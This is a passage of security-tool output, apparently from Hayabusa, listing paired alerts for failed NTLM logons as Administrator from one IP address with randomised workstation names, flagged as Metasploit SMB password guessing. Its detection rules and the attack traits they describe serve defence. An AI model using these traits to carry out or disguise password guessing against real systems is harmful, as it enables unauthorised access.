19962016-09-20 01:50:27.170 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19972016-09-20 01:50:27.170 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19982016-09-20 01:50:27.248 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19992016-09-20 01:50:27.248 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20002016-09-20 01:50:27.290 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20012016-09-20 01:50:27.290 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20022016-09-20 01:50:27.361 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20032016-09-20 01:50:27.361 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20042016-09-20 01:50:27.424 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20052016-09-20 01:50:27.424 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20062016-09-20 01:50:27.496 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20072016-09-20 01:50:27.496 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20082016-09-20 01:50:27.537 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20092016-09-20 01:50:27.537 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20102016-09-20 01:50:27.577 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20112016-09-20 01:50:27.577 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20122016-09-20 01:50:27.624 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20132016-09-20 01:50:27.624 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20142016-09-20 01:50:27.710 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20152016-09-20 01:50:27.710 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20162016-09-20 01:50:27.772 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20172016-09-20 01:50:27.772 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20182016-09-20 01:50:27.812 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20192016-09-20 01:50:27.812 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20202016-09-20 01:50:27.848 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20212016-09-20 01:50:27.848 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20222016-09-20 01:50:27.897 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20232016-09-20 01:50:27.897 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20242016-09-20 01:50:27.939 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20252016-09-20 01:50:27.939 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20262016-09-20 01:50:27.976 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20272016-09-20 01:50:27.976 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20282016-09-20 01:50:28.013 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20292016-09-20 01:50:28.013 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20302016-09-20 01:50:28.056 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20312016-09-20 01:50:28.056 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20322016-09-20 01:50:28.096 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20332016-09-20 01:50:28.096 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20342016-09-20 01:50:28.176 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20352016-09-20 01:50:28.176 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20362016-09-20 01:50:28.204 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Secu